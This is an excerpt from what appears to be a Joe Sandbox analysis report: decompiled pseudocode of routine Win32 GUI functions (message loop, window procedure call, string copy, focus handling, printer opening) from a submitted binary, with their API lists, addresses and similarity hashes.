                                                                                                                                                                                                                                                                                          				void* _t37;
                                                                                                                                                                                                                                                                                          				void* _t39;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t26 = __edi;
                                                                                                                                                                                                                                                                                          				_t28 = __edi + 0x1c;
                                                                                                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                                                                                                          					_t19 = 0;
                                                                                                                                                                                                                                                                                          					_v8 = 1;
                                                                                                                                                                                                                                                                                          					goto L2;
                                                                                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                                                                                          						do {
                                                                                                                                                                                                                                                                                          							do {
                                                                                                                                                                                                                                                                                          								L2:
                                                                                                                                                                                                                                                                                          								if(_v8 != 0) {
                                                                                                                                                                                                                                                                                          									while(PeekMessageA(_t28, 0, 0, 0, 0) == 0) {
                                                                                                                                                                                                                                                                                          										_t11 =  *((intOrPtr*)( *((intOrPtr*)( *_t26 + 4))))(_t19);
                                                                                                                                                                                                                                                                                          										_t19 = _t19 + 1;
                                                                                                                                                                                                                                                                                          										if(_t11 != 0) {
                                                                                                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_v8 = _t11;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										goto L6;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								L6:
                                                                                                                                                                                                                                                                                          								_t8 = GetMessageA(_t28, 0, 0, 0);
                                                                                                                                                                                                                                                                                          							} while (_t8 == 0xffffffff);
                                                                                                                                                                                                                                                                                          							if(_t8 != 0) {
                                                                                                                                                                                                                                                                                          								_push(_t28);
                                                                                                                                                                                                                                                                                          								if( *((intOrPtr*)( *((intOrPtr*)( *_t26))))() == 0) {
                                                                                                                                                                                                                                                                                          									TranslateMessage(_t28);
                                                                                                                                                                                                                                                                                          									DispatchMessageA(_t28);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t15 =  *((intOrPtr*)(_t26 + 0x20));
                                                                                                                                                                                                                                                                                          								_t37 = _t15 - 0x118;
                                                                                                                                                                                                                                                                                          								if(_t37 > 0) {
                                                                                                                                                                                                                                                                                          									goto L15;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									goto L11;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								L18:
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							return  *((intOrPtr*)(_t26 + 0x24));
                                                                                                                                                                                                                                                                                          							goto L18;
                                                                                                                                                                                                                                                                                          							L11:
                                                                                                                                                                                                                                                                                          						} while (_t37 == 0 || _t15 == 0xf);
                                                                                                                                                                                                                                                                                          						_t39 = _t15 - 0xa0;
                                                                                                                                                                                                                                                                                          						L15:
                                                                                                                                                                                                                                                                                          					} while (_t39 == 0);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                                                                          0x000f49a0
                                                                                                                                                                                                                                                                                          0x000f49a6
                                                                                                                                                                                                                                                                                          0x000f49a9
                                                                                                                                                                                                                                                                                          0x000f49a9
                                                                                                                                                                                                                                                                                          0x000f49ab
                                                                                                                                                                                                                                                                                          0x000f49ab
                                                                                                                                                                                                                                                                                          0x000f49b2
                                                                                                                                                                                                                                                                                          0x000f49b2
                                                                                                                                                                                                                                                                                          0x000f49b2
                                                                                                                                                                                                                                                                                          0x000f49b2
                                                                                                                                                                                                                                                                                          0x000f49b6
                                                                                                                                                                                                                                                                                          0x000f49b8
                                                                                                                                                                                                                                                                                          0x000f49d3
                                                                                                                                                                                                                                                                                          0x000f49d5
                                                                                                                                                                                                                                                                                          0x000f49d8
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f49da
                                                                                                                                                                                                                                                                                          0x000f49da
                                                                                                                                                                                                                                                                                          0x000f49da
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f49d8
                                                                                                                                                                                                                                                                                          0x000f49b8
                                                                                                                                                                                                                                                                                          0x000f49dd
                                                                                                                                                                                                                                                                                          0x000f49e4
                                                                                                                                                                                                                                                                                          0x000f49ea
                                                                                                                                                                                                                                                                                          0x000f49f1
                                                                                                                                                                                                                                                                                          0x000f49f7
                                                                                                                                                                                                                                                                                          0x000f49fe
                                                                                                                                                                                                                                                                                          0x000f4a01
                                                                                                                                                                                                                                                                                          0x000f4a08
                                                                                                                                                                                                                                                                                          0x000f4a08
                                                                                                                                                                                                                                                                                          0x000f4a0e
                                                                                                                                                                                                                                                                                          0x000f4a11
                                                                                                                                                                                                                                                                                          0x000f4a16
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f4a16
                                                                                                                                                                                                                                                                                          0x000f4a3a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f4a18
                                                                                                                                                                                                                                                                                          0x000f4a18
                                                                                                                                                                                                                                                                                          0x000f4a1f
                                                                                                                                                                                                                                                                                          0x000f4a2b
                                                                                                                                                                                                                                                                                          0x000f4a2b
                                                                                                                                                                                                                                                                                          0x000f4a2d

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 000F49C1
                                                                                                                                                                                                                                                                                          • GetMessageA.USER32 ref: 000F49E4
                                                                                                                                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 000F4A01
                                                                                                                                                                                                                                                                                          • DispatchMessageA.USER32 ref: 000F4A08
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Message$DispatchPeekTranslate
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4217535847-0
                                                                                                                                                                                                                                                                                          • Opcode ID: d97acd31dc5453dd9c57b4b2ca11d271aad4b87132e5ebaf96b3f2e5e8532b65
                                                                                                                                                                                                                                                                                          • Instruction ID: 3c3a6716c3eb048b4486dea627b4cb661bb50104854acffed00259e6f19a03ba
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d97acd31dc5453dd9c57b4b2ca11d271aad4b87132e5ebaf96b3f2e5e8532b65
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E111A330741209ABE7658B58DD88BBF73E8FF49300F204111EB15D79D0D7B4EE81A686
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E000FD5E0(void* __eax, signed short _a4, signed short _a8, long _a12) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v76;
                                                                                                                                                                                                                                                                                          				intOrPtr _v80;
                                                                                                                                                                                                                                                                                          				intOrPtr _v84;
                                                                                                                                                                                                                                                                                          				intOrPtr _v88;
                                                                                                                                                                                                                                                                                          				intOrPtr _v92;
                                                                                                                                                                                                                                                                                          				intOrPtr _v96;
                                                                                                                                                                                                                                                                                          				long _v100;
                                                                                                                                                                                                                                                                                          				char _v104;
                                                                                                                                                                                                                                                                                          				intOrPtr _v108;
                                                                                                                                                                                                                                                                                          				char _v112;
                                                                                                                                                                                                                                                                                          				intOrPtr _t23;
                                                                                                                                                                                                                                                                                          				void* _t41;
                                                                                                                                                                                                                                                                                          				long _t42;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t41 = __eax;
                                                                                                                                                                                                                                                                                          				_v108 = 0;
                                                                                                                                                                                                                                                                                          				_v92 = 0;
                                                                                                                                                                                                                                                                                          				_v88 = 0;
                                                                                                                                                                                                                                                                                          				_v84 = 0;
                                                                                                                                                                                                                                                                                          				_v80 = DefWindowProcA;
                                                                                                                                                                                                                                                                                          				_v76 =  *((intOrPtr*)(__eax + 0x24));
                                                                                                                                                                                                                                                                                          				_v112 = 0x112d7c;
                                                                                                                                                                                                                                                                                          				_v104 =  &_v112;
                                                                                                                                                                                                                                                                                          				_v100 = GetCurrentThreadId();
                                                                                                                                                                                                                                                                                          				EnterCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          				_t23 =  *0x170c80; // 0x0
                                                                                                                                                                                                                                                                                          				_v96 = _t23;
                                                                                                                                                                                                                                                                                          				 *0x170c80 =  &_v104;
                                                                                                                                                                                                                                                                                          				LeaveCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          				_t42 = CallWindowProcA( *(_t41 + 0x20),  *(_t41 + 4), 0x111, (_a4 & 0x0000ffff) << 0x00000010 | _a8 & 0x0000ffff, _a12);
                                                                                                                                                                                                                                                                                          				_t29 = _v92;
                                                                                                                                                                                                                                                                                          				if(_v92 != 0) {
                                                                                                                                                                                                                                                                                          					E00105701(_t29);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _t42;
                                                                                                                                                                                                                                                                                          			}
















                                                                                                                                                                                                                                                                                          0x000fd5e7
                                                                                                                                                                                                                                                                                          0x000fd5f7
                                                                                                                                                                                                                                                                                          0x000fd5fa
                                                                                                                                                                                                                                                                                          0x000fd5fd
                                                                                                                                                                                                                                                                                          0x000fd600
                                                                                                                                                                                                                                                                                          0x000fd603
                                                                                                                                                                                                                                                                                          0x000fd606
                                                                                                                                                                                                                                                                                          0x000fd609
                                                                                                                                                                                                                                                                                          0x000fd610
                                                                                                                                                                                                                                                                                          0x000fd61e
                                                                                                                                                                                                                                                                                          0x000fd621
                                                                                                                                                                                                                                                                                          0x000fd627
                                                                                                                                                                                                                                                                                          0x000fd634
                                                                                                                                                                                                                                                                                          0x000fd637
                                                                                                                                                                                                                                                                                          0x000fd63d
                                                                                                                                                                                                                                                                                          0x000fd668
                                                                                                                                                                                                                                                                                          0x000fd66a
                                                                                                                                                                                                                                                                                          0x000fd66f
                                                                                                                                                                                                                                                                                          0x000fd672
                                                                                                                                                                                                                                                                                          0x000fd672
                                                                                                                                                                                                                                                                                          0x000fd67e

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 000FD613
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00170C68), ref: 000FD621
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00170C68), ref: 000FD63D
                                                                                                                                                                                                                                                                                          • CallWindowProcA.USER32 ref: 000FD662
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$CallCurrentEnterLeaveProcThreadWindow
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2970181515-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 7454d5363815628c7ce8a4e4b547eb85241c483f04998bef25eaacac906ec167
                                                                                                                                                                                                                                                                                          • Instruction ID: b6262df4abab06a5fe484af84a5fd11630186ab6127beea2b7a109c811b26cdd
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7454d5363815628c7ce8a4e4b547eb85241c483f04998bef25eaacac906ec167
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9711E971D00308DFDB55DFA9D9848ADFBF8FB48710F10861AE949EB654D7B49881CB50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E000FB3E0(intOrPtr* __ebx, void* __edi, intOrPtr _a4, CHAR* _a8) {
                                                                                                                                                                                                                                                                                          				intOrPtr _t5;
                                                                                                                                                                                                                                                                                          				signed int _t18;
                                                                                                                                                                                                                                                                                          				signed int _t23;
                                                                                                                                                                                                                                                                                          				CHAR* _t25;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t5 =  *((intOrPtr*)(__ebx + 4));
                                                                                                                                                                                                                                                                                          				_t23 = _t5 - _a4 + 0xe10f;
                                                                                                                                                                                                                                                                                          				if(_t23 < 0 || _t23 >= _t5) {
                                                                                                                                                                                                                                                                                          					L9:
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t18 = _t23 * 0x104;
                                                                                                                                                                                                                                                                                          					if(lstrlenA( *__ebx + _t18) < 0x104) {
                                                                                                                                                                                                                                                                                          						if(_t23 >=  *((intOrPtr*)(__ebx + 4))) {
                                                                                                                                                                                                                                                                                          							RaiseException(0xc000008c, 1, 0, 0);
                                                                                                                                                                                                                                                                                          							goto L9;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t25 =  *__ebx + _t18;
                                                                                                                                                                                                                                                                                          							if(lstrlenA(_t25) < 0x104) {
                                                                                                                                                                                                                                                                                          								lstrcpyA(_a8, _t25);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							return 1;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                                                                                          0x000fb3e3
                                                                                                                                                                                                                                                                                          0x000fb3ec
                                                                                                                                                                                                                                                                                          0x000fb3f2
                                                                                                                                                                                                                                                                                          0x000fb459
                                                                                                                                                                                                                                                                                          0x000fb45d
                                                                                                                                                                                                                                                                                          0x000fb3f8
                                                                                                                                                                                                                                                                                          0x000fb3fd
                                                                                                                                                                                                                                                                                          0x000fb411
                                                                                                                                                                                                                                                                                          0x000fb41e
                                                                                                                                                                                                                                                                                          0x000fb453
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fb420
                                                                                                                                                                                                                                                                                          0x000fb422
                                                                                                                                                                                                                                                                                          0x000fb430
                                                                                                                                                                                                                                                                                          0x000fb437
                                                                                                                                                                                                                                                                                          0x000fb437
                                                                                                                                                                                                                                                                                          0x000fb445
                                                                                                                                                                                                                                                                                          0x000fb445
                                                                                                                                                                                                                                                                                          0x000fb413
                                                                                                                                                                                                                                                                                          0x000fb418
                                                                                                                                                                                                                                                                                          0x000fb418
                                                                                                                                                                                                                                                                                          0x000fb411

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,000F86BD,?,?,?,?,?), ref: 000FB406
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,000F86BD,?,?,?,?,?), ref: 000FB425
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?,?,?,000F86BD,?,?,?,?,?), ref: 000FB437
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcpy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 805584807-0
                                                                                                                                                                                                                                                                                          • Opcode ID: e17052f21732ad1665b0083ac61683a80dcc3a123290eda6587b65a7e664f364
                                                                                                                                                                                                                                                                                          • Instruction ID: 58a81f98ec266c1c9e02cabb7afbf672db055ca36e3a3ce74c82783bc72784c2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e17052f21732ad1665b0083ac61683a80dcc3a123290eda6587b65a7e664f364
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E01D033B0012457DB105798ED8CBD5B758EB54350F058422FA48EB941C3B5F8D19790
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E00101570(void* __eax, void* __edi) {
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed char _t25;
                                                                                                                                                                                                                                                                                          				void* _t38;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t38 = __eax;
                                                                                                                                                                                                                                                                                          				if(( *(__eax + 0x84) & 0x00000080) != 0) {
                                                                                                                                                                                                                                                                                          					if(( *(__eax + 0x58) & 0x00000004) == 0) {
                                                                                                                                                                                                                                                                                          						L5:
                                                                                                                                                                                                                                                                                          						if(IsWindow( *(_t38 + 0x5c)) != 0) {
                                                                                                                                                                                                                                                                                          							SetFocus( *(_t38 + 0x5c));
                                                                                                                                                                                                                                                                                          							goto L7;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						if(IsWindow( *(__eax + 0xac)) == 0) {
                                                                                                                                                                                                                                                                                          							if(( *(_t38 + 0x58) & 0x00000004) == 0) {
                                                                                                                                                                                                                                                                                          								goto L5;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							SetFocus( *(_t38 + 0xac));
                                                                                                                                                                                                                                                                                          							L7:
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *(_t38 + 0xac) = 0;
                                                                                                                                                                                                                                                                                          				SendMessageA( *(_t38 + 4), 0x449, 0, 0);
                                                                                                                                                                                                                                                                                          				_t25 =  *(_t38 + 0x85);
                                                                                                                                                                                                                                                                                          				if((_t25 & 0x00000002) != 0 && (_t25 & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                          					_t25 = E00101600(0, _t38);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *(_t38 + 0x85) =  *(_t38 + 0x85) & 0x0000007f;
                                                                                                                                                                                                                                                                                          				return _t25;
                                                                                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                                                                                          0x00101571
                                                                                                                                                                                                                                                                                          0x0010157a
                                                                                                                                                                                                                                                                                          0x00101587
                                                                                                                                                                                                                                                                                          0x001015a5
                                                                                                                                                                                                                                                                                          0x001015ad
                                                                                                                                                                                                                                                                                          0x001015b3
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001015b3
                                                                                                                                                                                                                                                                                          0x00101589
                                                                                                                                                                                                                                                                                          0x00101594
                                                                                                                                                                                                                                                                                          0x001015a3
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00101596
                                                                                                                                                                                                                                                                                          0x001015b3
                                                                                                                                                                                                                                                                                          0x001015b3
                                                                                                                                                                                                                                                                                          0x001015b3
                                                                                                                                                                                                                                                                                          0x00101594
                                                                                                                                                                                                                                                                                          0x001015b9
                                                                                                                                                                                                                                                                                          0x001015c7
                                                                                                                                                                                                                                                                                          0x001015d1
                                                                                                                                                                                                                                                                                          0x001015d7
                                                                                                                                                                                                                                                                                          0x001015df
                                                                                                                                                                                                                                                                                          0x001015e7
                                                                                                                                                                                                                                                                                          0x001015e7
                                                                                                                                                                                                                                                                                          0x001015ec
                                                                                                                                                                                                                                                                                          0x001015f4

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • IsWindow.USER32(?), ref: 00101590
                                                                                                                                                                                                                                                                                          • IsWindow.USER32(?), ref: 001015A9
                                                                                                                                                                                                                                                                                          • SetFocus.USER32(?,?,000FEB52,?,?,?), ref: 001015B3
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000449,00000000,00000000), ref: 001015D1
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Window$FocusMessageSend
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2164539323-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 9c999da0be0c4b9362dec5d242f2f1b8dd790adf7d27bf5326c0ae57a788284d
                                                                                                                                                                                                                                                                                          • Instruction ID: 194381d692016d03efb1aee4efee49181f797aaebdc87ccf1fe00277f060b209
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c999da0be0c4b9362dec5d242f2f1b8dd790adf7d27bf5326c0ae57a788284d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F101B171614B40AAE73597789C44F93A7D86F87718F04890CEAD78A2D1C7F8F841CB20
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                                                                                                          			E000FC5D0(signed int __eax, void** __edi, void* _a4) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				void* _t12;
                                                                                                                                                                                                                                                                                          				void* _t14;
                                                                                                                                                                                                                                                                                          				signed int _t18;
                                                                                                                                                                                                                                                                                          				char* _t20;
                                                                                                                                                                                                                                                                                          				void** _t23;
                                                                                                                                                                                                                                                                                          				signed int _t24;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t23 = __edi;
                                                                                                                                                                                                                                                                                          				_t24 = __eax;
                                                                                                                                                                                                                                                                                          				_t18 = 0;
                                                                                                                                                                                                                                                                                          				_t12 = GlobalLock(_a4);
                                                                                                                                                                                                                                                                                          				if(_t12 != 0) {
                                                                                                                                                                                                                                                                                          					_t20 = _t12 + ( *(_t12 + 2) & 0x0000ffff);
                                                                                                                                                                                                                                                                                          					_t14 =  *__edi;
                                                                                                                                                                                                                                                                                          					if(_t14 != 0) {
                                                                                                                                                                                                                                                                                          						ClosePrinter(_t14);
                                                                                                                                                                                                                                                                                          						 *__edi = 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v12 = _t24;
                                                                                                                                                                                                                                                                                          					asm("sbb esi, esi");
                                                                                                                                                                                                                                                                                          					_v16 = 0;
                                                                                                                                                                                                                                                                                          					_v8 = 8;
                                                                                                                                                                                                                                                                                          					OpenPrinterA(_t20, _t23,  ~_t24 &  &_v16);
                                                                                                                                                                                                                                                                                          					_t18 = _t20 & 0xffffff00 |  *_t23 != 0x00000000;
                                                                                                                                                                                                                                                                                          					GlobalUnlock(_a4);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _t18;
                                                                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                                                                          0x000fc5d0
                                                                                                                                                                                                                                                                                          0x000fc5d8
                                                                                                                                                                                                                                                                                          0x000fc5de
                                                                                                                                                                                                                                                                                          0x000fc5e0
                                                                                                                                                                                                                                                                                          0x000fc5e8
                                                                                                                                                                                                                                                                                          0x000fc5ee
                                                                                                                                                                                                                                                                                          0x000fc5f0
                                                                                                                                                                                                                                                                                          0x000fc5f4
                                                                                                                                                                                                                                                                                          0x000fc5f7
                                                                                                                                                                                                                                                                                          0x000fc5fd
                                                                                                                                                                                                                                                                                          0x000fc5fd
                                                                                                                                                                                                                                                                                          0x000fc603
                                                                                                                                                                                                                                                                                          0x000fc608
                                                                                                                                                                                                                                                                                          0x000fc612
                                                                                                                                                                                                                                                                                          0x000fc619
                                                                                                                                                                                                                                                                                          0x000fc620
                                                                                                                                                                                                                                                                                          0x000fc62d
                                                                                                                                                                                                                                                                                          0x000fc630
                                                                                                                                                                                                                                                                                          0x000fc630
                                                                                                                                                                                                                                                                                          0x000fc63d

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32 ref: 000FC5E0
                                                                                                                                                                                                                                                                                          • ClosePrinter.WINSPOOL.DRV(00000000,?,?,?,?), ref: 000FC5F7
                                                                                                                                                                                                                                                                                          • OpenPrinterA.WINSPOOL.DRV(?,?,?), ref: 000FC620
                                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(?), ref: 000FC630
                                                                                                                                                                                                                                                                                          Memory Dump Source
